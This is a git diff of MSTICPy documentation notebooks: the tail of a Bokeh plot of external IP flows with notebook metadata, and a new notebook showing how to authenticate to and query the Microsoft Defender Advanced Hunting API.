"2530\",\"type\":\"CategoricalAxis\"},{\"attributes\":{},\"id\":\"2556\",\"type\":\"AllLabels\"},{\"attributes\":{},\"id\":\"2557\",\"type\":\"CategoricalTickFormatter\"},{\"attributes\":{},\"id\":\"2531\",\"type\":\"CategoricalTicker\"},{\"attributes\":{\"axis\":{\"id\":\"2530\"},\"grid_line_alpha\":0.1,\"grid_line_color\":\"navy\",\"ticker\":null},\"id\":\"2532\",\"type\":\"Grid\"},{\"attributes\":{},\"id\":\"2534\",\"type\":\"CategoricalTicker\"},{\"attributes\":{\"active_multi\":null,\"tools\":[{\"id\":\"2536\"},{\"id\":\"2537\"},{\"id\":\"2538\"},{\"id\":\"2539\"},{\"id\":\"2540\"},{\"id\":\"2548\"}]},\"id\":\"2542\",\"type\":\"Toolbar\"},{\"attributes\":{\"axis_label\":\"DestinationIP\",\"axis_line_color\":null,\"formatter\":{\"id\":\"2557\"},\"major_label_policy\":{\"id\":\"2556\"},\"major_label_standoff\":0,\"major_label_text_font_size\":\"11pt\",\"major_tick_line_color\":null,\"ticker\":{\"id\":\"2534\"}},\"id\":\"2533\",\"type\":\"CategoricalAxis\"},{\"attributes\":{},\"id\":\"2563\",\"type\":\"UnionRenderers\"},{\"attributes\":{},\"id\":\"2559\",\"type\":\"AllLabels\"},{\"attributes\":{\"axis\":{\"id\":\"2533\"},\"dimension\":1,\"grid_line_alpha\":0.1,\"grid_line_color\":\"navy\",\"ticker\":null},\"id\":\"2535\",\"type\":\"Grid\"},{\"attributes\":{},\"id\":\"2562\",\"type\":\"Selection\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"#1f77b4\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"red\"},\"marker\":{\"value\":\"circle_cross\"},\"size\":{\"value\":5},\"x\":{\"field\":\"SourceIP\"},\"y\":{\"field\":\"DestinationIP\"}},\"id\":\"2552\",\"type\":\"Scatter\"},{\"attributes\":{\"bottom_units\":\"screen\",\"fill_alpha\":0.5,\"fill_color\":\"lightgrey\",\"left_units\":\"screen\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[4,4],\"line_width\":2,\"right_units\":\"screen\",\"syncable\":false,\"top_units\":\"screen\"},\"id\":\"2541\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.6},\"fill_color\":{\"value\":\"#1f77b4\"},\"line_color\":{\"value\":\"red\"},\"marker\":{\"value\":\"circle_cross\"},\"size\":{\"value\":5},\"x\":{\"field\":\"SourceIP\"},\"y\":{\"field\":\"DestinationIP\"}},\"id\":\"2551\",\"type\":\"Scatter\"},{\"attributes\":{\"callback\":null,\"tooltips\":[[\"SourceIP\",\"@SourceIP\"],[\"DestinationIP\",\"@DestinationIP\"],[\"value\",\"@size\"]]},\"id\":\"2548\",\"type\":\"HoverTool\"},{\"attributes\":{\"factors\":[\"99.84.104.63\",\"90.130.70.73\",\"8.249.241.254\",\"72.21.91.29\",\"72.21.81.240\",\"72.21.81.200\",\"65.55.44.109\",\"65.55.44.108\",\"52.239.152.10\",\"52.168.138.145\",\"52.165.170.112\",\"40.91.75.5\",\"40.77.232.95\",\"40.77.228.69\",\"40.77.226.250\",\"40.124.45.19\",\"23.48.36.78\",\"23.4.187.27\",\"20.38.98.100\",\"172.217.15.99\",\"157.55.134.136\",\"13.83.148.218\",\"13.71.172.130\",\"13.71.172.128\",\"13.68.93.109\",\"13.67.143.117\",\"13.65.107.32\",\"104.43.212.12\"]},\"id\":\"2524\",\"type\":\"FactorRange\"},{\"attributes\":{\"data_source\":{\"id\":\"2518\"},\"glyph\":{\"id\":\"2551\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"2552\"},\"view\":{\"id\":\"2554\"}},\"id\":\"2553\",\"type\":\"GlyphRenderer\"},{\"attributes\":{},\"id\":\"2536\",\"type\":\"WheelZoomTool\"},{\"attributes\":{\"text\":\"External IP flows (intersection)\",\"text_font_size\":\"15pt\"},\"id\":\"2520\",\"type\":\"Title\"},{\"attributes\":{\"source\":{\"id\":\"2518\"}},\"id\":\"2554\",\"type\":\"CDSView\"},{\"attributes\":{},\"id\":\"2540\",\"type\":\"SaveTool\"},{\"attributes\":{\"overlay\":{\"id\":\"2541\"}},\"id\":\"2537\",\"type\":\"BoxZoomTool\"},{\"attributes\":{},\"id\":\"2538\",\"type\":\"PanTool\"},{\"attributes\":{},\"id\":\"2539\",\"type\":\"ResetTool\"}],\"root_ids\":[\"2519\"]},\"title\":\"Bokeh Application\",\"version\":\"2.3.2\"}};\n  var render_items = [{\"docid\":\"9342d9cb-90c3-46be-879b-bc9b7200143b\",\"root_ids\":[\"2519\"],\"roots\":{\"2519\":\"5161c325-188a-45cd-8049-b4a695981208\"}}];\n  root.Bokeh.embed.embed_items_notebook(docs_json, render_items);\n\n  }\n  if (root.Bokeh !== undefined) {\n    embed_document(root);\n  } else {\n    var attempts = 0;\n    var timer = setInterval(function(root) {\n      if (root.Bokeh !== undefined) {\n        clearInterval(timer);\n        embed_document(root);\n      } else {\n        attempts++;\n        if (attempts > 100) {\n          clearInterval(timer);\n          console.log(\"Bokeh: ERROR: Unable to run BokehJS code because BokehJS library is missing\");\n        }\n      }\n    }, 10, root)\n  }\n})(window);"
+     },
+     "metadata": {
+      "application/vnd.bokehjs_exec.v0+json": {
+       "id": "2519"
+      }
+     }
+    },
+    {
+     "output_type": "execute_result",
+     "data": {
+      "text/plain": [
+       "Figure(id='2519', ...)"
+      ],
+      "text/html": [
+       "<div style=\"display: table;\"><div style=\"display: table-row;\"><div style=\"display: table-cell;\"><b title=\"bokeh.plotting.figure.Figure\">Figure</b>(</div><div style=\"display: table-cell;\">id&nbsp;=&nbsp;'2519', <span id=\"2616\" style=\"cursor: pointer;\">&hellip;)</span></div></div><div class=\"2615\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">above&nbsp;=&nbsp;[],</div></div><div class=\"2615\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">align&nbsp;=&nbsp;'start',</div></div><div class=\"2615\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">aspect_ratio&nbsp;=&nbsp;None,</div></div><div class=\"2615\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">aspect_scale&nbsp;=&nbsp;1,</div></div><div class=\"2615\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">background&nbsp;=&nbsp;None,</div></div><div class=\"2615\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">background_fill_alpha&nbsp;=&nbsp;1.0,</div></div><div class=\"2615\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">background_fill_color&nbsp;=&nbsp;'#ffffff',</div></div><div class=\"2615\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">below&nbsp;=&nbsp;[CategoricalAxis(id='2530', ...)],</div></div><div class=\"2615\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">border_fill_alpha&nbsp;=&nbsp;1.0,</div></div><div class=\"2615\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">border_fill_color&nbsp;=&nbsp;'#ffffff',</div></div><div class=\"2615\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">center&nbsp;=&nbsp;[Grid(id='2532', ...), Grid(id='2535', ...)],</div></div><div class=\"2615\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">css_classes&nbsp;=&nbsp;[],</div></div><div class=\"2615\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">disabled&nbsp;=&nbsp;False,</div></div><div class=\"2615\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">extra_x_ranges&nbsp;=&nbsp;{},</div></div><div class=\"2615\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">extra_y_ranges&nbsp;=&nbsp;{},</div></div><div class=\"2615\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">frame_height&nbsp;=&nbsp;None,</div></div><div class=\"2615\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">frame_width&nbsp;=&nbsp;None,</div></div><div class=\"2615\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">height&nbsp;=&nbsp;700,</div></div><div class=\"2615\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">height_policy&nbsp;=&nbsp;'auto',</div></div><div class=\"2615\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">hidpi&nbsp;=&nbsp;True,</div></div><div class=\"2615\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">inner_height&nbsp;=&nbsp;0,</div></div><div class=\"2615\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">inner_width&nbsp;=&nbsp;0,</div></div><div class=\"2615\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">js_event_callbacks&nbsp;=&nbsp;{},</div></div><div class=\"2615\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">js_property_callbacks&nbsp;=&nbsp;{},</div></div><div class=\"2615\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">left&nbsp;=&nbsp;[CategoricalAxis(id='2533', ...)],</div></div><div class=\"2615\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">lod_factor&nbsp;=&nbsp;10,</div></div><div class=\"2615\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">lod_interval&nbsp;=&nbsp;300,</div></div><div class=\"2615\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">lod_threshold&nbsp;=&nbsp;2000,</div></div><div class=\"2615\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">lod_timeout&nbsp;=&nbsp;500,</div></div><div class=\"2615\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">margin&nbsp;=&nbsp;(0, 0, 0, 0),</div></div><div class=\"2615\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">match_aspect&nbsp;=&nbsp;False,</div></div><div class=\"2615\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">max_height&nbsp;=&nbsp;None,</div></div><div class=\"2615\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">max_width&nbsp;=&nbsp;None,</div></div><div class=\"2615\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border&nbsp;=&nbsp;5,</div></div><div class=\"2615\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border_bottom&nbsp;=&nbsp;None,</div></div><div class=\"2615\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border_left&nbsp;=&nbsp;None,</div></div><div class=\"2615\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border_right&nbsp;=&nbsp;None,</div></div><div class=\"2615\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border_top&nbsp;=&nbsp;None,</div></div><div class=\"2615\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_height&nbsp;=&nbsp;None,</div></div><div class=\"2615\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_width&nbsp;=&nbsp;None,</div></div><div class=\"2615\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">name&nbsp;=&nbsp;None,</div></div><div class=\"2615\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outer_height&nbsp;=&nbsp;0,</div></div><div class=\"2615\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outer_width&nbsp;=&nbsp;0,</div></div><div class=\"2615\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_alpha&nbsp;=&nbsp;1.0,</div></div><div class=\"2615\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_cap&nbsp;=&nbsp;'butt',</div></div><div class=\"2615\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_color&nbsp;=&nbsp;None,</div></div><div class=\"2615\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_dash&nbsp;=&nbsp;[],</div></div><div class=\"2615\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_dash_offset&nbsp;=&nbsp;0,</div></div><div class=\"2615\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_join&nbsp;=&nbsp;'bevel',</div></div><div class=\"2615\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_width&nbsp;=&nbsp;1,</div></div><div class=\"2615\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">output_backend&nbsp;=&nbsp;'canvas',</div></div><div class=\"2615\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">renderers&nbsp;=&nbsp;[GlyphRenderer(id='2553', ...)],</div></div><div class=\"2615\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">reset_policy&nbsp;=&nbsp;'standard',</div></div><div class=\"2615\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">right&nbsp;=&nbsp;[],</div></div><div class=\"2615\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">sizing_mode&nbsp;=&nbsp;None,</div></div><div class=\"2615\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">subscribed_events&nbsp;=&nbsp;[],</div></div><div class=\"2615\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">syncable&nbsp;=&nbsp;True,</div></div><div class=\"2615\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">tags&nbsp;=&nbsp;[],</div></div><div class=\"2615\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">title&nbsp;=&nbsp;Title(id='2520', ...),</div></div><div class=\"2615\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">title_location&nbsp;=&nbsp;'above',</div></div><div class=\"2615\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">toolbar&nbsp;=&nbsp;Toolbar(id='2542', ...),</div></div><div class=\"2615\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">toolbar_location&nbsp;=&nbsp;'above',</div></div><div class=\"2615\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">toolbar_sticky&nbsp;=&nbsp;True,</div></div><div class=\"2615\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">visible&nbsp;=&nbsp;True,</div></div><div class=\"2615\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">width&nbsp;=&nbsp;900,</div></div><div class=\"2615\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">width_policy&nbsp;=&nbsp;'auto',</div></div><div class=\"2615\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">x_range&nbsp;=&nbsp;FactorRange(id='2522', ...),</div></div><div class=\"2615\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">x_scale&nbsp;=&nbsp;CategoricalScale(id='2526', ...),</div></div><div class=\"2615\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">y_range&nbsp;=&nbsp;FactorRange(id='2524', ...),</div></div><div class=\"2615\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">y_scale&nbsp;=&nbsp;CategoricalScale(id='2528', ...))</div></div></div>\n",
+       "<script>\n",
+       "(function() {\n",
+       "  var expanded = false;\n",
+       "  var ellipsis = document.getElementById(\"2616\");\n",
+       "  ellipsis.addEventListener(\"click\", function() {\n",
+       "    var rows = document.getElementsByClassName(\"2615\");\n",
+       "    for (var i = 0; i < rows.length; i++) {\n",
+       "      var el = rows[i];\n",
+       "      el.style.display = expanded ? \"none\" : \"table-row\";\n",
+       "    }\n",
+       "    ellipsis.innerHTML = expanded ? \"&hellip;)\" : \"&lsaquo;&lsaquo;&lsaquo;\";\n",
+       "    expanded = !expanded;\n",
+       "  });\n",
+       "})();\n",
+       "</script>\n"
+      ]
+     },
+     "metadata": {},
+     "execution_count": 19
+    }
+   ],
+   "metadata": {}
+  }
+ ],
+ "metadata": {
+  "celltoolbar": "Tags",
+  "hide_input": false,
+  "interpreter": {
+   "hash": "b736adfe05d9ae282eea4c01a733d58a0215ef3399d39339e6557e4c515b0f48"
+  },
+  "kernelspec": {
+   "name": "python3",
+   "display_name": "Python 3.7.10 64-bit (conda)"
+  },
+  "language_info": {
+   "codemirror_mode": {
+    "name": "ipython",
+    "version": 3
+   },
+   "file_extension": ".py",
+   "mimetype": "text/x-python",
+   "name": "python",
+   "nbconvert_exporter": "python",
+   "pygments_lexer": "ipython3",
+   "version": "3.7.10"
+  },
+  "toc": {
+   "base_numbering": 1,
+   "nav_menu": {
+    "height": "318.996px",
+    "width": "320.994px"
+   },
+   "number_sections": false,
+   "sideBar": true,
+   "skip_h1_title": false,
+   "title_cell": "Table of Contents",
+   "title_sidebar": "Contents",
+   "toc_cell": true,
+   "toc_position": {
+    "height": "calc(100% - 180px)",
+    "left": "10px",
+    "top": "150px",
+    "width": "165px"
+   },
+   "toc_section_display": true,
+   "toc_window_display": true
+  },
+  "varInspector": {
+   "cols": {
+    "lenName": 16,
+    "lenType": 16,
+    "lenVar": 40
+   },
+   "kernels_config": {
+    "python": {
+     "delete_cmd_postfix": "",
+     "delete_cmd_prefix": "del ",
+     "library": "var_list.py",
+     "varRefreshCmd": "print(var_dic_list())"
+    },
+    "r": {
+     "delete_cmd_postfix": ") ",
+     "delete_cmd_prefix": "rm(",
+     "library": "var_list.r",
+     "varRefreshCmd": "cat(var_dic_list()) "
+    }
+   },
+   "position": {
+    "height": "406.193px",
+    "left": "1468.4px",
+    "right": "20px",
+    "top": "120px",
+    "width": "456.572px"
+   },
+   "types_to_exclude": [
+    "module",
+    "function",
+    "builtin_function_or_method",
+    "instance",
+    "_Feature"
+   ],
+   "window_display": false
+  },
+  "widgets": {
+   "application/vnd.jupyter.widget-state+json": {
+    "state": {
+     "06408c1d26364c62bdef336cfec1716d": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "0dcf54e606e447f1a462e63dd4f23d2c": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "height": "150px",
+       "width": "300px"
+      }
+     },
+     "1b1e59ba52c44f6b9ec3c405f1da5ed2": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "LabelModel",
+      "state": {
+       "layout": "IPY_MODEL_386a4307520e405aaee15c6cd1edfc06",
+       "style": "IPY_MODEL_06408c1d26364c62bdef336cfec1716d"
+      }
+     },
+     "34e9742e64954d27b14150a4d980c6ad": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "70%"
+      }
+     },
+     "386a4307520e405aaee15c6cd1edfc06": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "99%"
+      }
+     },
+     "438313fbe5f14b908d6c010c2200ceef": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "height": "150px",
+       "width": "300px"
+      }
+     },
+     "54a6e82f90754a82bfd1abab3ba5cf0d": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "95%"
+      }
+     },
+     "70f8295184f44e84837be49dc197024c": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "95%"
+      }
+     },
+     "74e4e00ea8984e1bbd94960547d47563": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "99%"
+      }
+     },
+     "826ce822cc1d41bbb6255a4c6fba81d6": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "70%"
+      }
+     },
+     "8cb49661379e4bc391d22ea6996368d9": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "70%"
+      }
+     }
+    },
+    "version_major": 2,
+    "version_minor": 0
+   }
+  }
+ },
+ "nbformat": 4,
+ "nbformat_minor": 4
+}
\ No newline at end of file
diff --git a/docs/notebooks/MicrosoftDefender.ipynb b/docs/notebooks/MicrosoftDefender.ipynb
new file mode 100644
index 000000000..8090521a0
--- /dev/null
+++ b/docs/notebooks/MicrosoftDefender.ipynb
@@ -0,0 +1,1742 @@
+{
+ "cells": [
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "# Querying Microsoft Defender Data\n",
+    "MSTICPy versions >= 1.5.0\n",
+    "\n",
+    "### Description\n",
+    "This Notebook provides details and examples of how to connect to and query data from the Microsoft Defender Advanced Hunting API.\n",
+    "\n",
+    "<p style=\"border: solid; padding: 5pt\"><b>Note: </b>\n",
+    "This notebook reflects a partially-updated component and still\n",
+    "uses the \"MDATP\" abbreviation to refer to the Microsoft 365 Defender\n",
+    "and Microsoft Defender for Endpoint data services.\n",
+    "</p>\n",
+    "\n",
+    "### Installation"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": null,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "%pip install --upgrade msticpy"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Authentication\n",
+    "\n",
+    "Authentication for the Microsoft Defender Advanced Hunting API is handled via an Azure AD application. Before you can authenticate you will need to register an application and provide it with the required permissions. MSTICpy supports Application Context authentication to the API.\n",
+    "Detailed instructions on registering an application can be found here: \n",
+    "- [Get access with an application context](https://docs.microsoft.com/microsoft-365/security/defender-endpoint/exposed-apis-create-app-webapp?view=o365-worldwide)\n",
+    "- [Get access with a user context](https://docs.microsoft.com/microsoft-365/security/defender-endpoint/exposed-apis-create-app-nativeapp?view=o365-worldwide)\n",
+    "\n",
+    "Once created you will require the following details:\n",
+    "* Application (client) ID\n",
+    "* Directory (tenant) ID\n",
+    "* Client secret\n",
+    "\n",
+    "These details can be found in the Azure Portal under Azure Active Directory > App Registrations.\n",
+    "\n",
+    "Once collected the easiest way to manage these details is via msticpyconfig.yaml - simply add them to the file in the following format:\n",
+    "\n",
+    "```yaml\n",
+    "DataProviders:\n",
+    "  MicrosoftDefender:\n",
+    "    Args:\n",
+    "      ClientId: \"CLIENT ID\"\n",
+    "      ClientSecret:\n",
+    "        KeyVault: \n",
+    "      TenantId: \"TENANT ID\"\n",
+    "```"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "You can then initialize a data provider for Microsoft Defender and connect the provider.\n",
+    "\n",
+    "Note: you can also provide these values to the connect function.\n",
+    "See [Microsoft Defender data provider](https://msticpy.readthedocs.io/en/latest/data_acquisition/DataProviders.html#microsoft-defender)\n",
+    "\n",
+    "<p style=\"border: solid; padding: 5pt\"><b>Note: </b>\n",
+    "If you want to access the Microsoft Defender for Endpoint\n",
+    "APIs rather than the M365 Defender API (the latter is a subset\n",
+    "of the former), please use \"MDE\" as the parameter to QueryProvider.\n",
+    "</p>"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 5,
+   "metadata": {
+    "scrolled": true
+   },
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "Connected.\n"
+     ]
+    },
+    {
+     "data": {
+      "text/plain": [
+       "{'token_type': 'Bearer',\n",
+       " 'expires_in': '3599',\n",
+       " 'ext_expires_in': '3599',\n",
+       " 'expires_on': '1578009447',\n",
+       " 'not_before': '1578005547',\n",
+       " 'resource': 'https://api.securitycenter.windows.com',\n",
+       " 'access_token': None}"
+      ]
+     },
+     "execution_count": 5,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "from msticpy.data.data_providers import QueryProvider\n",
+    "md_prov = QueryProvider('M365D')\n",
+    "\n",
+    "md_prov.connect()"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "Once connected the Microsoft Defender data connector functions in a similar manner to other data connectors. You can list queries:"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 9,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/plain": [
+       "['MDATP.file_path',\n",
+       " 'MDATP.host_alerts',\n",
+       " 'MDATP.host_connections',\n",
+       " 'MDATP.ip_alerts',\n",
+       " 'MDATP.ip_connections',\n",
+       " 'MDATP.list_alerts',\n",
+       " 'MDATP.list_connections',\n",
+       " 'MDATP.list_filehash',\n",
+       " 'MDATP.list_files',\n",
+       " 'MDATP.list_host_processes',\n",
+       " 'MDATP.process_cmd_line',\n",
+       " 'MDATP.process_creations',\n",
+       " 'MDATP.process_paths',\n",
+       " 'MDATP.protocol_connections',\n",
+       " 'MDATP.sha1_alerts',\n",
+       " 'MDATP.url_alerts',\n",
+       " 'MDATP.url_connections',\n",
+       " 'MDATP.user_files',\n",
+       " 'MDATP.user_logons',\n",
+       " 'MDATP.user_network',\n",
+       " 'MDATP.user_processes',\n",
+       " 'MDATPHunting.accessibility_persistence',\n",
+       " 'MDATPHunting.av_sites',\n",
+       " 'MDATPHunting.b64_pe',\n",
+       " 'MDATPHunting.brute_force',\n",
+       " 'MDATPHunting.cve_2018_1000006l',\n",
+       " 'MDATPHunting.cve_2018_1111',\n",
+       " 'MDATPHunting.cve_2018_4878',\n",
+       " 'MDATPHunting.doc_with_link',\n",
+       " 'MDATPHunting.dropbox_link',\n",
+       " 'MDATPHunting.email_link',\n",
+       " 'MDATPHunting.email_smartscreen',\n",
+       " 'MDATPHunting.malware_recycle',\n",
+       " 'MDATPHunting.network_scans',\n",
+       " 'MDATPHunting.powershell_downloads',\n",
+       " 'MDATPHunting.service_account_powershell',\n",
+       " 'MDATPHunting.smartscreen_ignored',\n",
+       " 'MDATPHunting.smb_discovery',\n",
+       " 'MDATPHunting.tor',\n",
+       " 'MDATPHunting.uncommon_powershell',\n",
+       " 'MDATPHunting.user_enumeration']"
+      ]
+     },
+     "execution_count": 9,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "md_prov.list_queries()"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "Get details about avaliable queries:"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 20,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "Query:  list_connections\n",
+      "Data source:  MDATP\n",
+      "Retrieves list of network connections for a host\n",
+      "\n",
+      "Parameters\n",
+      "----------\n",
+      "add_query_items: str (optional)\n",
+      "    Additional query clauses\n",
+      "end: datetime (optional)\n",
+      "    Query end time\n",
+      "start: datetime (optional)\n",
+      "    Query start time\n",
+      "    (default value is: -30)\n",
+      "table: str (optional)\n",
+      "    Table name\n",
+      "    (default value is: NetworkCommunicationEvents  )\n",
+      "Query:\n",
+      " {table} | where EventTime >= datetime({start}) | where EventTime <= datetime({end}) {add_query_items}\n"
+     ]
+    }
+   ],
+   "source": [
+    "md_prov.MDATP.list_alerts('?')"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "Execute queries with default parameters:"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 39,
+   "metadata": {
+    "scrolled": true
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
